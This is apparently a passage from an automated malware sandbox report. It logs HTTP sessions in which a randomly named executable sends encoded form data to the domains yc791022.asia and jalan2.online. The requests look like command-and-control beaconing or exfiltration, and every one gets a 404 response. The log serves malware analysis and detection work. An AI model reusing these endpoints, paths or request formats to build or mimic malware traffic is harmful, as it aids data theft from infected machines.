                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.1050002101.35.209.183806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:25.636650085 CET619OUTPOST /wu7k/ HTTP/1.1
                                                                              Host: www.yc791022.asia
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.yc791022.asia
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.yc791022.asia/wu7k/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 72 75 73 63 56 71 31 69 4c 4b 34 4b 4a 57 5a 73 31 34 6d 6f 77 37 59 30 6f 41 6b 43 4c 71 57 55 38 67 31 72 70 58 74 2b 75 48 77 79 56 49 63 68 46 69 31 56 6b 62 54 76 30 72 6b 7a 66 6a 6a 77 4f 42 56 42 52 67 5a 69 2f 2f 70 58 53 4f 34 2b 65 4c 73 78 78 5a 44 31 67 6c 57 4d 78 58 46 39 6b 61 31 47 42 6c 55 61 59 34 71 35 41 54 68 43 72 41 65 68 77 61 61 50 75 75 42 2f 4d 67 70 67 36 4c 63 59 45 38 56 73 52 75 51 49 36 70 4c 4c 49 56 52 39 75 4c 53 59 4a 36 41 36 30 42 6f 65 4a 4f 6c 4d 6f 39 58 49 4b 6a 74 6d 41 67 6d 67 55 62 62 33 63 2f 32 6d 4b 6d 65 66
                                                                              Data Ascii: 6NVpdLF=ruscVq1iLK4KJWZs14mow7Y0oAkCLqWU8g1rpXt+uHwyVIchFi1VkbTv0rkzfjjwOBVBRgZi//pXSO4+eLsxxZD1glWMxXF9ka1GBlUaY4q5AThCrAehwaaPuuB/Mgpg6LcYE8VsRuQI6pLLIVR9uLSYJ6A60BoeJOlMo9XIKjtmAgmgUbb3c/2mKmef
                                                                              Dec 2, 2024 14:45:27.169576883 CET427INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:45:26 GMT
                                                                              Server: Apache
                                                                              Content-Length: 263
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.1050003101.35.209.183806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:28.304949045 CET643OUTPOST /wu7k/ HTTP/1.1
                                                                              Host: www.yc791022.asia
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.yc791022.asia
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.yc791022.asia/wu7k/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 72 75 73 63 56 71 31 69 4c 4b 34 4b 54 32 70 73 30 66 79 6f 33 62 59 33 32 51 6b 43 45 4b 57 51 38 67 35 72 70 57 5a 75 75 53 67 79 56 6f 4d 68 44 58 42 56 70 37 54 76 38 4c 6b 72 52 44 6a 33 4f 42 59 38 52 68 6c 69 2f 2f 39 58 53 4b 30 2b 66 34 30 77 78 4a 44 7a 2b 46 57 4f 2f 33 46 39 6b 61 31 47 42 68 31 50 59 35 43 35 41 43 52 43 6b 45 71 69 35 36 61 4d 70 75 42 2f 49 67 70 38 36 4c 63 36 45 35 6f 78 52 73 59 49 36 6f 37 4c 4c 48 70 36 39 72 54 54 57 71 42 7a 6c 6a 74 41 42 75 52 4f 74 4c 50 34 54 69 64 68 4b 68 62 6e 46 4b 36 67 50 49 71 6f 45 67 72 31 55 62 4b 58 61 44 53 6e 41 78 35 2b 59 6b 41 43 4a 6f 74 36 63 67 3d 3d
                                                                              Data Ascii: 6NVpdLF=ruscVq1iLK4KT2ps0fyo3bY32QkCEKWQ8g5rpWZuuSgyVoMhDXBVp7Tv8LkrRDj3OBY8Rhli//9XSK0+f40wxJDz+FWO/3F9ka1GBh1PY5C5ACRCkEqi56aMpuB/Igp86Lc6E5oxRsYI6o7LLHp69rTTWqBzljtABuROtLP4TidhKhbnFK6gPIqoEgr1UbKXaDSnAx5+YkACJot6cg==
                                                                              Dec 2, 2024 14:45:29.927292109 CET427INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:45:29 GMT
                                                                              Server: Apache
                                                                              Content-Length: 263
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.1050004101.35.209.183806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:30.982059956 CET1656OUTPOST /wu7k/ HTTP/1.1
                                                                              Host: www.yc791022.asia
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.yc791022.asia
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.yc791022.asia/wu7k/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 72 75 73 63 56 71 31 69 4c 4b 34 4b 54 32 70 73 30 66 79 6f 33 62 59 33 32 51 6b 43 45 4b 57 51 38 67 35 72 70 57 5a 75 75 53 6f 79 56 37 30 68 41 77 64 56 6f 37 54 76 79 72 6b 6f 52 44 6a 6d 4f 42 41 77 52 68 70 63 2f 38 46 58 55 70 38 2b 4b 35 30 77 36 4a 44 7a 32 6c 57 4c 78 58 45 6e 6b 65 52 4b 42 6c 5a 50 59 35 43 35 41 42 4a 43 6a 51 65 69 31 61 61 50 75 75 41 72 4d 67 70 59 36 4c 55 51 45 34 34 68 51 63 34 49 37 49 72 4c 48 53 46 36 2b 4c 54 52 56 71 42 72 6c 69 52 68 42 75 4d 78 74 4c 54 65 54 68 4e 68 4c 6c 2b 64 52 71 2b 32 56 6f 72 77 45 67 7a 6a 57 63 57 30 53 42 33 6a 4e 53 78 42 4d 48 78 49 4a 35 51 33 41 4c 55 46 54 59 6e 6e 71 77 44 79 78 41 59 73 6a 71 47 49 43 52 66 4e 31 70 58 41 41 47 63 39 69 64 61 69 58 6d 2f 4f 72 71 77 6e 62 72 56 41 63 49 36 7a 4c 45 6e 4c 41 66 4d 4b 53 33 46 70 6c 77 6e 6c 61 58 53 49 73 78 6d 72 68 64 50 4f 65 43 48 56 34 48 47 4e 61 57 79 73 30 52 4c 4c 41 66 52 38 79 71 4c 71 65 41 56 2b 67 53 75 73 36 62 46 32 41 78 38 4c 4b 45 [TRUNCATED]
                                                                              Data Ascii: 6NVpdLF=ruscVq1iLK4KT2ps0fyo3bY32QkCEKWQ8g5rpWZuuSoyV70hAwdVo7TvyrkoRDjmOBAwRhpc/8FXUp8+K50w6JDz2lWLxXEnkeRKBlZPY5C5ABJCjQei1aaPuuArMgpY6LUQE44hQc4I7IrLHSF6+LTRVqBrliRhBuMxtLTeThNhLl+dRq+2VorwEgzjWcW0SB3jNSxBMHxIJ5Q3ALUFTYnnqwDyxAYsjqGICRfN1pXAAGc9idaiXm/OrqwnbrVAcI6zLEnLAfMKS3FplwnlaXSIsxmrhdPOeCHV4HGNaWys0RLLAfR8yqLqeAV+gSus6bF2Ax8LKEKQ1MV69cYI1/QEJhBxFvtkx1/930loOvM8pF/TGhcBBNBMURfmYE1fuRhjWef6ziGEiYT54t3k48/tcLJhCzM8ET1Bl6voqyqJ1UI89LYUAdY3xQhYo3FtvrH176Q8U4dDwL8mi6K7a2sK0coezQIXWwT92lnOnvHDV8u8GMYANjRqyh+70C8RBajgmDmhhagykHO0lfns1oRopCJxY6Yszjn7lP2ConvTCPIjZaJNMIADTIk61J8X7WN0ObG6kEzfo/QROL0flZdIiWoeRZkEix0UneurTkABsi+0LIAJGX7+PGxt51tHFlF45lmQqL/cSCHI9P/uD2ZSFf7iIyaPr6mFPXFOAdKJvHViYwlSfyNw4MKocjk0yiNSlWo7geRlrnoT/01gj4DbalALMSXI+d425CSk7JrXh3FUlWBocz2XQ9QlmGX4Hf9IW1SmdLNWjpeDai3wlnM00HmV19HzRoZZtgf6RKGrrVTjfDyK8R6U5VnUja0W3R1GGMV9X1MjPHbj2NBd2gac1TieINuafn/iO6iwWGjI7+AC3hv/Q8H0VVqu1NMY9KmILAgY36ReUXkXk5Jnw3dZHVFoDTcJc3DUh5W/n29xIMuTFdy15gpOCpNeE7UcstZD/Frm+CshPKE1Q7APooT6zIVziPY58kWCAuSSDx6r [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.1050005101.35.209.183806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:33.646073103 CET356OUTGET /wu7k/?6NVpdLF=msE8We8dGqsfRntWrquh0bsz2FoIUbe83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVP+ofPy3OtxFAtreRUZwpBdqa4QiZw9w==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.yc791022.asia
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:45:35.283304930 CET427INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:45:35 GMT
                                                                              Server: Apache
                                                                              Content-Length: 263
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.1050006108.181.189.7806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:40.854090929 CET619OUTPOST /ykgd/ HTTP/1.1
                                                                              Host: www.jalan2.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.jalan2.online
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.jalan2.online/ykgd/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 77 71 6a 67 78 4b 2f 33 71 4d 73 4f 6a 50 6d 75 51 49 77 68 61 48 2f 6c 63 73 4d 35 4f 50 35 44 56 62 65 44 2b 70 58 4e 43 63 46 45 6f 73 56 51 4e 5a 59 7a 59 43 6f 6c 7a 75 73 5a 33 33 6d 66 2b 74 64 4b 69 38 32 39 37 4b 4a 57 78 68 6a 6a 64 68 77 42 36 66 6e 50 58 74 6e 6d 39 31 73 49 72 74 34 41 50 6d 75 79 73 46 30 57 50 61 36 78 71 4c 78 35 73 32 62 30 64 32 74 39 35 4a 54 6b 4d 70 4c 41 39 76 54 64 6f 41 2f 6f 74 50 33 73 48 47 7a 6a 6f 30 50 72 52 53 31 58 56 6c 44 6b 32 65 39 44 62 30 66 30 64 44 42 4d 51 49 4c 54 77 68 76 6e 51 2f 53 36 7a 34 68 6f
                                                                              Data Ascii: 6NVpdLF=wqjgxK/3qMsOjPmuQIwhaH/lcsM5OP5DVbeD+pXNCcFEosVQNZYzYColzusZ33mf+tdKi8297KJWxhjjdhwB6fnPXtnm91sIrt4APmuysF0WPa6xqLx5s2b0d2t95JTkMpLA9vTdoA/otP3sHGzjo0PrRS1XVlDk2e9Db0f0dDBMQILTwhvnQ/S6z4ho
                                                                              Dec 2, 2024 14:45:42.241408110 CET279INHTTP/1.1 404 Not Found
                                                                              content-type: text/html
                                                                              cache-control: private, no-cache, max-age=0
                                                                              pragma: no-cache
                                                                              date: Mon, 02 Dec 2024 13:45:42 GMT
                                                                              server: LiteSpeed
                                                                              content-encoding: gzip
                                                                              vary: Accept-Encoding
                                                                              transfer-encoding: chunked
                                                                              connection: close
                                                                              Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                                              Data Ascii: a
                                                                              Dec 2, 2024 14:45:42.241652966 CET713INData Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e
                                                                              Data Ascii: 2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.1050007108.181.189.7806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:43.522030115 CET643OUTPOST /ykgd/ HTTP/1.1
                                                                              Host: www.jalan2.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.jalan2.online
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.jalan2.online/ykgd/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 77 71 6a 67 78 4b 2f 33 71 4d 73 4f 73 50 32 75 57 70 77 68 64 6e 2f 6d 51 4d 4d 35 63 50 35 50 56 62 53 44 2b 6f 53 56 43 4f 52 45 6d 6f 52 51 4d 64 73 7a 62 43 6f 6c 37 4f 73 63 36 58 6d 45 2b 74 52 34 69 39 36 39 37 4b 4e 57 78 67 54 6a 64 53 6f 4f 34 50 6e 42 50 64 6e 6b 69 46 73 49 72 74 34 41 50 6d 37 36 73 42 59 57 50 70 69 78 71 75 64 36 68 57 62 33 4d 32 74 39 6f 35 53 74 4d 70 4c 79 39 72 61 4b 6f 44 58 6f 74 50 48 73 65 33 7a 67 6d 30 50 78 56 53 30 65 62 56 71 64 76 74 74 38 43 56 48 30 43 44 63 74 58 70 32 55 68 77 4f 77 44 49 4f 30 39 2b 55 43 38 63 4e 45 78 32 4b 48 57 45 2f 58 4a 67 71 42 4c 63 66 4b 56 51 3d 3d
                                                                              Data Ascii: 6NVpdLF=wqjgxK/3qMsOsP2uWpwhdn/mQMM5cP5PVbSD+oSVCOREmoRQMdszbCol7Osc6XmE+tR4i9697KNWxgTjdSoO4PnBPdnkiFsIrt4APm76sBYWPpixqud6hWb3M2t9o5StMpLy9raKoDXotPHse3zgm0PxVS0ebVqdvtt8CVH0CDctXp2UhwOwDIO09+UC8cNEx2KHWE/XJgqBLcfKVQ==
                                                                              Dec 2, 2024 14:45:44.717104912 CET279INHTTP/1.1 404 Not Found
                                                                              content-type: text/html
                                                                              cache-control: private, no-cache, max-age=0
                                                                              pragma: no-cache
                                                                              date: Mon, 02 Dec 2024 13:45:44 GMT
                                                                              server: LiteSpeed
                                                                              content-encoding: gzip
                                                                              vary: Accept-Encoding
                                                                              transfer-encoding: chunked
                                                                              connection: close
                                                                              Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                                              Data Ascii: a
                                                                              Dec 2, 2024 14:45:44.717664957 CET713INData Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e
                                                                              Data Ascii: 2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.1050008108.181.189.7806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:46.182585001 CET1656OUTPOST /ykgd/ HTTP/1.1
                                                                              Host: www.jalan2.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.jalan2.online
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.jalan2.online/ykgd/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 77 71 6a 67 78 4b 2f 33 71 4d 73 4f 73 50 32 75 57 70 77 68 64 6e 2f 6d 51 4d 4d 35 63 50 35 50 56 62 53 44 2b 6f 53 56 43 4f 70 45 6d 62 5a 51 4e 38 73 7a 55 69 6f 6c 6b 2b 73 64 36 58 6d 4a 2b 73 35 38 69 39 47 74 37 4a 6c 57 77 47 6e 6a 66 6e 45 4f 78 50 6e 42 54 74 6e 6c 39 31 74 51 72 74 6f 45 50 6d 72 36 73 42 59 57 50 6f 53 78 6a 62 78 36 6e 57 62 30 64 32 74 48 35 4a 54 49 4d 70 6a 69 39 72 66 33 70 79 33 6f 74 76 58 73 46 6c 62 67 71 30 50 33 53 53 30 47 62 56 32 38 76 74 42 61 43 56 6a 65 43 42 4d 74 54 4a 37 66 77 69 61 4a 52 72 79 75 33 49 31 6c 75 4c 30 74 2f 6d 6e 54 41 57 54 35 4d 6a 71 58 4a 74 54 41 4b 77 45 4c 58 39 41 77 58 51 2f 4e 2f 64 77 61 66 52 33 37 74 2b 56 34 46 49 44 63 59 49 41 6e 6a 50 31 4d 31 66 66 4d 37 37 63 6a 33 66 51 55 36 51 46 35 6e 5a 5a 55 53 34 65 72 6c 6a 75 53 69 74 4c 59 54 42 64 42 70 35 58 56 45 6c 55 7a 4e 79 61 39 35 74 43 75 4c 36 6a 54 63 37 76 52 4a 57 78 34 4c 79 5a 78 78 4c 63 6c 75 48 52 70 78 66 65 61 55 59 76 64 78 56 [TRUNCATED]
                                                                              Data Ascii: 6NVpdLF=wqjgxK/3qMsOsP2uWpwhdn/mQMM5cP5PVbSD+oSVCOpEmbZQN8szUiolk+sd6XmJ+s58i9Gt7JlWwGnjfnEOxPnBTtnl91tQrtoEPmr6sBYWPoSxjbx6nWb0d2tH5JTIMpji9rf3py3otvXsFlbgq0P3SS0GbV28vtBaCVjeCBMtTJ7fwiaJRryu3I1luL0t/mnTAWT5MjqXJtTAKwELX9AwXQ/N/dwafR37t+V4FIDcYIAnjP1M1ffM77cj3fQU6QF5nZZUS4erljuSitLYTBdBp5XVElUzNya95tCuL6jTc7vRJWx4LyZxxLcluHRpxfeaUYvdxVka6nujWhMpqYqPHUb9EsIyTFL4nnU8oJbpBeJfPm4x2/JvcuAMrlNJBJtEqQnv79SB7B+VURxmrUaus27qfmj70cJt4bSzBalHFCTXTUOHu05VFcD2QL6ONESC84pYp6rGUJh/8HPJZhZZ3vpV131nX7CSR33YCc08XeAoGZMcbSkEHbFJmnrfGNDO60CEOdcY7U1+k2CzzkegEYuQLw5YoP6DfDeNBhuT8+KJUOkjWL/YZhmdrLE5ax5kpFZFvDh6sNfyqKNgH90EjW4smm5B6dYfXg9IH+EzVEvSN16SuLby+aw/nxkdBndShPUGe7ti9tDaA7h8KbGSODz5C+BpSteMnlGm7H7OG6GIFT1693fobbCvUWtQptG7xzycEKHMEWuO5ZeumRGt2ODT14hqhAkO89GEMpF6fN9cDAZg7qn8a1zjfwnsEkkEXPQahriebQNcvpopJaL7ohTnVcckxJWeFb2STtqZTAiDlNch5k0jALxkENKEL/tbsZ6wIrhtBKt+46oWipGsGq9erh/0vdyCZuVuQg0qljNtafGm+UUjSYZm/shBz3HscEHKC4Mt2xoVtAsEcNaEBadDLiZ/2rA9Nt0NitG4LH9ba4zFXpgc5seI2mp5hJcdzNfJWeqaxRs5YpH35UpWv3sltVPUrc4yquxA6pcA [TRUNCATED]
                                                                              Dec 2, 2024 14:45:47.588088036 CET279INHTTP/1.1 404 Not Found
                                                                              content-type: text/html
                                                                              cache-control: private, no-cache, max-age=0
                                                                              pragma: no-cache
                                                                              date: Mon, 02 Dec 2024 13:45:47 GMT
                                                                              server: LiteSpeed
                                                                              content-encoding: gzip
                                                                              vary: Accept-Encoding
                                                                              transfer-encoding: chunked
                                                                              connection: close
                                                                              Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                                              Data Ascii: a
                                                                              Dec 2, 2024 14:45:47.588228941 CET713INData Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e
                                                                              Data Ascii: 2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.1050009108.181.189.7806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:48.849193096 CET356OUTGET /ykgd/?_jVx=rlV0_TQ81&6NVpdLF=9oLAy+SEg8JXgI2TBYJ+cgbVH4pSJ447WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/wtvWbtjylB0D75gbWHC72kMsIY/h9A== HTTP/1.1
                                                                              Host: www.jalan2.online
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:45:49.996381998 CET1236INHTTP/1.1 404 Not Found
                                                                              content-type: text/html
                                                                              cache-control: private, no-cache, max-age=0
                                                                              pragma: no-cache
                                                                              content-length: 1249
                                                                              date: Mon, 02 Dec 2024 13:45:49 GMT
                                                                              server: LiteSpeed
                                                                              connection: close
